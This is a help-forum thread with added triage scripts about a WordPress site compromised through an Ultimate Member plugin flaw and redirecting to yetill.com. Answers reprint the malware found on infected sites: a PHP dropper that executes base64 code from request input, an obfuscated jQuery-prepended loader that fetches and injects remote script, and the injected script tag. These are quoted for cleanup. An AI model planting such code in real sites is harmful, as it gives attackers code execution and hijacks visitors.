

Can anyone help me fix my site? It is always redirecting to yetill.com. I searched for this site and learned that it is a kind of malware. I tried various solutions found on the net, but it is still not solved.

Thanks.

Hamza Ahmad
iamsushi_j12n
  • You restore everything from backups and possibly do a diff between that and the current state to see what was changed if you want to know. But backups are the way to go and then fix the site to not allow this to happen again. – Sami Kuhmonen Aug 14 '18 at 05:46
  • Do I have to compare each file, or just specific files? – iamsushi_j12n Aug 14 '18 at 05:49
  • You don’t *have to*, as long as you remove everything, restore a backup, and make sure all permissions and updates are in order if this is someone from outside doing this. – Sami Kuhmonen Aug 14 '18 at 05:57
  • Install this plugin in admin (https://wordpress.org/plugins/wordfence/) and scan the site. If that does not help, re-upload the backup if you have one; if not, first re-upload wp-admin and wp-includes (note: make sure you upload the correct version), then rename the plugin folder and try to find the malicious code in your theme. – Aakanksh Patel Aug 14 '18 at 05:59

8 Answers


Preliminary steps:

  1. Backup everything
  2. Check the file wp-includes/js/jquery/jquery.js - the first line should only contain a comment like /*! jQuery v1.... Delete anything before that line (you made a backup, right?)
  3. Check your /wp-content/uploads directory for suspicious files. In our case there were malicious files, e.g. in this subdirectory: /ultimatemember/temp/[random dir]/n.php. Delete those after making a backup.
  4. Install WordFence WP plugin and scan your site
  5. Double-check that wp-includes/js/jquery/jquery.js is still OK (it can be modified again)
  6. Consider the WordFence option "Disable Code Execution for Uploads directory" to prevent future intrusions if that works for your site (test!).

Background:

We have the same problem. Wordfence noticed that the file wp-includes/js/jquery/jquery.js was modified on the server. Restoring it to the original version seemed to solve it. BUT the file got infected again quickly (within hours?). So we do not know the source yet...

We found some suspicious code in /wp-content/uploads/ultimatemember/temp/[random dir]/n.php:

<?php file_put_contents('sdgsdfgsdg','<?php '.base64_decode($_REQUEST['q']));
include('sdgsdfgsdg'); unlink('sdgsdfgsdg'); ?>

That basically executes any PHP code from outside...

After deleting those files, the site did seem to be back to normal (for a couple of hours).

We also noticed a suspicious <a> tag in the page source; but not sure about its relevance.

<a class="html-attribute-value html-resource-link" target="_blank"
href="https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4"
rel="noreferrer noopener">https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4</a>
Markus Junginger
Vivien

You will have to do some troubleshooting. It is either your theme or one of your plugins that contains the malicious code.

Follow these steps:

  • Switch to a default theme like TwentySeventeen - If the issue persists, it means it is not your theme.
  • Deactivate all your active plugins and check the website - The issue should go away.
  • Begin reactivating your plugins, clearing the cache after each reactivation and checking your website - Whenever the issue shows up again, it is that plugin that's the culprit and you cannot use that plugin.

Hope this helps.

Hamza Ahmad

We have the same error, these files were infected. This is the malicious code I've found in them.

wp-includes/js/jquery/jquery.js

(function() { "use strict"; var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()} })();

themes/yourtheme/header.php

<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
  • Can you elaborate on your answer? Why are they "malicious"? How do you fix it? Try to make your answer more usable for future readers. – franiis Aug 14 '18 at 08:58
  • The code adds a js redirection to the header, we have not found the source of the problem yet. We are planning to export all our content and do a complete new installation of WP to get rid of any infected files. – shadowclover Aug 14 '18 at 09:54
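The payload quoted above hides its strings behind `\xNN` escapes so that a grep for the domain finds nothing. Decoding that array is a routine static-triage step and recovers the indicators a responder needs (the remote URL to block and search access logs for) without running anything. The following is an added example, not code from the original post: `SAMPLE_JS` is the payload exactly as quoted in the answer, and the helper names and regexes are constructed.

```python
"""Static triage for a hex-escaped JavaScript string array. Added example, not
part of the original post. SAMPLE_JS is the payload quoted in the answer; it is
only parsed as text, never executed."""
import re

SAMPLE_JS = r'''(function() { "use strict"; var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()} })();'''

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
ARRAY_DECL = re.compile(r"var\s+(\w+)\s*=\s*\[(.*?)\];", re.S)   # var NAME=[ ... ];
STRING_LIT = re.compile(r'"((?:[^"\\]|\\.)*)"')                   # one double-quoted literal
URL = re.compile(r"^https?://", re.I)


def unescape_hex(s: str) -> str:
    """Turn \\x47\\x45\\x54 into GET; characters that are not escapes pass through."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def decode_string_arrays(js: str) -> dict:
    """Map every `var NAME=[...]` string array in the source to its decoded strings."""
    return {m.group(1): [unescape_hex(s) for s in STRING_LIT.findall(m.group(2))]
            for m in ARRAY_DECL.finditer(js)}


def extract_urls(strings) -> list:
    """The decoded strings that are URLs: these are the indicators to block and log-search."""
    return [s for s in strings if URL.match(s)]


def inline_array_refs(js: str, arrays: dict) -> str:
    """Replace NAME[N] lookups with the decoded literal so the flow reads plainly,
    e.g. document[_0xa8bd[7]](_0xa8bd[6]) becomes document["createElement"]("script")."""
    def repl(m):
        name, idx = m.group(1), int(m.group(2))
        if name in arrays and idx < len(arrays[name]):
            return '"' + arrays[name][idx] + '"'
        return m.group(0)
    return re.sub(r"\b(\w+)\[(\d+)\]", repl, js)


def triage(js: str) -> dict:
    """Decoded arrays, URL indicators and a readable rewrite of the sample."""
    arrays = decode_string_arrays(js)
    all_strings = [s for strings in arrays.values() for s in strings]
    return {"arrays": arrays, "urls": extract_urls(all_strings),
            "readable": inline_array_refs(js, arrays)}


if __name__ == "__main__":
    result = triage(SAMPLE_JS)
    print("decoded strings:", result["arrays"]["_0xa8bd"])
    print("indicators:", result["urls"])
    print("readable:", result["readable"])
```

The readable rewrite makes the behaviour shadowclover describes explicit: a synchronous GET to the decoded URL, and if the response is not "null", a `<script>` element whose `src` is whatever that response contained, appended to `<head>`. That is why the injected address can change without touching the infected file, and why blocking the single domain at the proxy or egress filter is a useful stop-gap while the files are cleaned.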

The jQuery file was infected in my case. Just delete the code before /*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */ and make sure that all of your plugins are updated and the site is secure. Also check the permissions of the files! That helped in my case.

Rosen

It seems that this is caused by a vulnerability in some plugin you might be using.

In my case it was the older version (prior to 2.22) of Ultimate Member plugin.

If you are using version 2.22 or earlier of this plugin, you should update it immediately and purge the temp files. (https://wordpress.org/support/topic/malicious-files-in-ultimate-members-plugin/)

After that, search for recently updated files with this command (e.g. the last 15 days):

find ./ -type f -mtime -15

Chances are your WP jQuery file and any files named "header" are likely to be infected.

/wp-includes/js/jquery/jquery.js
/wp-contents/your-theme/header.php
..

Remove the following script from your infected header files.

<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>

It looks like this is inserted right after the opening head tag and right before the closing head tag. Make sure you delete both.

Remove the maliciously inserted script from the infected jQuery file, or just replace the file with a clean one from another WP core installation.

I think this should fix the issue.

pinktig
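Two suggestions recur in this thread: list what changed recently (`find ./ -type f -mtime -15` above) and compare the site against a known-clean copy (Sami Kuhmonen's comment on the question, and "replace the file with a clean one from another WP core installation" here). The following is an added example, not code from the original answer, that does both in one pass: a Python equivalent of the `-mtime` listing, plus a SHA-256 comparison of the suspect tree against a reference tree (a fresh core download or a pre-infection backup) that reports modified, added and missing files. The file contents and the two temporary trees built by `build_sample_pair()` are constructed for the demonstration.

```python
"""Recent-modification listing and clean-reference diff for a WordPress tree.
Added example, not part of the original answer. Sample trees are constructed."""
import hashlib
import os
import tempfile
import time


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_hashes(root: str) -> dict:
    """Relative path -> SHA-256 for every regular file under root."""
    hashes = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            hashes[os.path.relpath(p, root)] = sha256_file(p)
    return hashes


def recently_modified(root: str, days: int) -> list:
    """Files whose mtime falls within the last `days` days (what `find -mtime -days` lists)."""
    cutoff = time.time() - days * 86400
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            if os.path.getmtime(p) >= cutoff:
                hits.append(os.path.relpath(p, root))
    return sorted(hits)


def diff_against_reference(suspect: str, reference: str) -> dict:
    """Compare a suspect tree with a clean one: changed core files, extra files (droppers,
    webshells under uploads) and files the attacker removed."""
    s, r = tree_hashes(suspect), tree_hashes(reference)
    return {
        "modified": sorted(k for k in s if k in r and s[k] != r[k]),
        "only_in_suspect": sorted(k for k in s if k not in r),
        "missing": sorted(k for k in r if k not in s),
    }


def _write(root: str, rel: str, text: str, age_days: int = 0) -> None:
    """Write a sample file; optionally back-date its mtime so it looks untouched."""
    p = os.path.join(root, rel)
    os.makedirs(os.path.dirname(p), exist_ok=True)
    with open(p, "w", encoding="utf-8") as f:
        f.write(text)
    if age_days:
        old = time.time() - age_days * 86400
        os.utime(p, (old, old))


def build_sample_pair():
    """Constructed reference and suspect trees mirroring the files named in this thread."""
    ref = tempfile.mkdtemp(prefix="wp-ref-")
    sus = tempfile.mkdtemp(prefix="wp-suspect-")
    jquery = "/*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */\n"
    header = "<head>\n<title>site</title>\n</head>\n"
    install = "<?php /* install.php, constructed placeholder */ ?>\n"
    for root in (ref, sus):
        _write(root, "wp-admin/install.php", install, age_days=30)   # identical, untouched
    _write(ref, "wp-includes/js/jquery/jquery.js", jquery, age_days=30)
    _write(ref, "wp-includes/theme-compat/header.php", header, age_days=30)
    # Suspect copy: stub prepended to jquery.js, the quoted tag injected into header.php,
    # and a dropper that exists only in the suspect tree.
    _write(sus, "wp-includes/js/jquery/jquery.js",
           "(function(){ /* constructed payload stub */ })();\n" + jquery)
    _write(sus, "wp-includes/theme-compat/header.php", header.replace(
        "<head>\n",
        "<head>\n<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>\n"))
    _write(sus, "wp-content/uploads/ultimatemember/temp/abc123/n.php",
           "<?php /* constructed dropper placeholder */ ?>\n")
    return sus, ref


if __name__ == "__main__":
    sus, ref = build_sample_pair()
    print("changed in last 15 days:", recently_modified(sus, 15))
    print("diff against reference:", diff_against_reference(sus, ref))
```

The mtime listing is quick but trivially defeated (an attacker can reset timestamps, and a theme update also touches many files), so treat it as a starting point; the hash diff against a trusted copy is the check that actually tells you which files to restore and which to inspect by hand.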

This is what I found today after running the Sucuri scanner. Hopefully this helps someone, because this one is a nasty one. In my case it appears to be affecting the following files:

  • wp-admin/install.php
  • wp-includes/js/jquery/jquery.js
  • wp-includes/theme-compat/header-embed.php
  • wp-includes/theme-compat/header.php

Whatever it was seemed to have gone ham on my wp-includes directory. I run the Ultimate Member plugin, and I noticed someone mentioned before that earlier versions of this plugin had vulnerabilities. I run a multi-site network and also noticed that two of the registration forms on my sub-sites had the default role of Administrator (what plugin vendor would find that secure as a default registration option?) with the auto-approve option enabled (no verification emails). Apparently activating this plugin in a network environment requires some extra thorough review of those registration and sign-in forms.

(image: Possible Infected Files)

halfer
  • (If you have an additional question, please ask that as a separate question; it may be better on the WordPress or Webmasters sites, since it is not a programming question). – halfer Aug 14 '18 at 21:39

Had the same issue. jQuery was infected and had to be replaced with the original version. The hacker probably used the Ultimate Member backdoor to upload a PHP file and execute it. I had to clean up the plugin temp directory.

Another observation was that the hack was forcing the modified jQuery to load a script whose address was fetched from http://src.eeduelements.com/get.php. This gives them the flexibility to rotate the ads.

sudo grep --include=\*.php -rnw . -e "<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>"

That, along with the answer below, helped me clean my files. It affected all of my websites, but it now seems to still persist on the site that had Ultimate Member on it. Still working on it. This PHP script was incredible though; thanks to the writer for sure.

PHP/SSH regex script/command to delete identical malware code from many files

This is the PHP from the above answer. I just swapped out the find portion with the malicious stuff redirecting to yetill.

<?php
// Enter the string exactly as it appears in the infected files and escape any single quotes
$find = '<script type=\'text/javascript\' src=\'https://cdn.eeduelements.com/jquery.js?ver=1.0.8\'></script>';

echo findString('./', $find);

// Walks $path recursively, strips every occurrence of $find from each *.php file
// that contains it, and returns a report of what was changed.
function findString($path, $find) {
    ob_start();
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
            if ($file != "." && $file != "..") {
                if (is_dir($path.'/'.$file)) {
                    $sub = findString($path.'/'.$file, $find);
                    if ($sub !== '') {   // only print non-empty reports from subdirectories
                        echo $sub.PHP_EOL;
                    }
                } else {
                    $ext = substr(strtolower($file), -3);
                    if ($ext == 'php') {
                        $filesource = file_get_contents($path.'/'.$file);
                        $pos = strpos($filesource, $find);
                        if ($pos === false) {
                            continue;
                        }
                        // The cleaning bit: remove the tag and write the file back
                        echo "The string '".htmlentities($find)."' was found in the file '$path/$file' at position $pos and has been removed from the source file.<br />";
                        $clean_source = str_replace($find, '', $filesource);
                        file_put_contents($path.'/'.$file, $clean_source);
                    }
                }
            }
        }
        closedir($handle);
    }
    $return = ob_get_contents();
    ob_end_clean();
    return $return;
}
?>